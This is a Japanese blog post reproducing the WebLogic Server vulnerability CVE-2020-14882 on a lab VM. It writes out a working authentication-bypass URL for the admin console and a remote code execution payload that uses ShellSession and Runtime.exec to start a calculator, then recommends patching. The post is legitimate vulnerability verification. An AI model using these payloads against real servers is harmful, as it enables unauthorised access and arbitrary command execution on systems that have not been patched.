10月ごろから非常に忙しく、あまり検証ができていませんでした。
最近少し落ち着いたので、何かやりたいなーと思っていたところ以下のニュースが目に留まりました。
・「Oracle WebLogic Server」に対する脆弱性攻撃、断続的に観測
前にWebLogicServerの検証はしたので、こちらを検証していきます。
環境の準備
前に以下を記事にしていますので、こちらを参考にやっていきます。
・WebLogic Server の脆弱性(CVE-2019-2725)を検証する!環境構築編
この記事と違うのはいくつかのバージョンだけです。
・Java
java version “1.8.0_211″⇒java version “1.8.0_271”
・WebLogic Server
12.1.3.0.0⇒12.2.1.4.0
あとは前回と同じです。
一度構築したことがあったので比較的短時間で環境ができました。
以下のURLにアクセスして準備完了です。
管理コンソール:http://192.168.119.131:7001/console/login/LoginForm.jsp
さて検証していきましょう!
脆弱性の検証
調べてみると、認証を迂回して管理コンソールにいきなりアクセスできる脆弱性があるようです。
試しに以下のURLにアクセスしてみましょう。
http://192.168.119.131:7001/console/images/%252E%252E%252Fconsole.portal
なんと、本当に認証せずに管理コンソールに認証せずにアクセスできてしまいました・・・
これだけでもかなり重大なのですが、さらにこちらのサイトを参考に以下のような入力をやってみます。
http://192.168.119.131:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('gnome-calculator');")
よくある電卓を起動させるコマンドを入力してみます。
すると、ブラウザ上はステータスコード404の画面が表示されていますね。
しかし、VMのほうを見てみると・・・
電卓が起動しています。
このことからコマンドが実行されたことがわかりました。
検証成功です。
まとめ
WebLogic ServerであるCVE-2020-14882の脆弱性の検証を行いました。
任意のコマンドが実行可能な非常に危険な脆弱性であることがわかります。
Oracleからパッチが出ているようなので、至急パッチ適用すること推奨します。
管理コンソールは外部に公開していないから大丈夫と考えている人もいるかと思いますが、標的型攻撃等、攻撃は中からもやってきますので、ちゃんと対策することは必要です。
※設定ミスで知らない間に見えてたパターンもありますし・・・
今後も検証は続けていきますので、興味がある方は見てみてください。
不明点や要望やこういったこともやって欲しいとの要望があれば、お問い合わせページやコメント、ツイッターからでも結構ですので、気軽にご連絡ください。
コメント